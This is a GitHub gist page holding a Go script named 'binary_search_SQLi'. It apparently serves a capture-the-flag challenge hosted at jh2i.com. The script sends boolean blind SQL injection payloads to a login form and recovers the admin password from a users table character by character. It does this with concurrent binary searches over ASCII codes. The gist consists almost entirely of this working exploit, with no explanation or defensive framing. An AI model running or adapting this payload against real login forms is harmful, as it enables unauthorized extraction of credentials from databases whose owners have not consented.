Skip to content

Instantly share code, notes, and snippets.

@Acebond
Created April 14, 2020 10:21
Show Gist options
  • Save Acebond/b980f0046fee6b70e66d1dc8c5c4aa8e to your computer and use it in GitHub Desktop.
Save Acebond/b980f0046fee6b70e66d1dc8c5c4aa8e to your computer and use it in GitHub Desktop.
binary_search_SQLi
package main
import (
"bytes"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"sync"
)
var (
targetURL = "http://jh2i.com:50011/"
flagLength = 50
)
func testBoolean(index int, char int) bool {
SQLi := fmt.Sprintf("asd' OR (ascii(substr((select password from users where username='admin'),%d,1))) > %d-- -", index, char)
//fmt.Println(SQLi)
postData := url.Values{"username": {SQLi}, "password": {"asdasd"}}
resp, err := http.PostForm(targetURL, postData)
if err != nil {
fmt.Printf("Error Reading HTTP Response: %s\n", err.Error())
os.Exit(1)
}
defer resp.Body.Close()
respBody, _ := ioutil.ReadAll(resp.Body)
//fmt.Println(string(respBody))
return bytes.Contains(respBody, []byte("Good job"))
}
func searchFlag(index int, low int, high int) rune {
mid := (low + high) / 2
if testBoolean(index, mid) {
if high-low == 1 {
return rune(high)
}
return searchFlag(index, mid, high)
} else {
if high-low == 1 {
return rune(low)
}
return searchFlag(index, low, mid)
}
}
func main() {
wg := sync.WaitGroup{}
results := make([]rune, flagLength)
for i := 0; i < flagLength; i++ {
wg.Add(1)
go func(i int) {
defer wg.Done()
results[i] = searchFlag(i+1, 32, 126)
}(i)
}
wg.Wait()
fmt.Println(string(results))
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment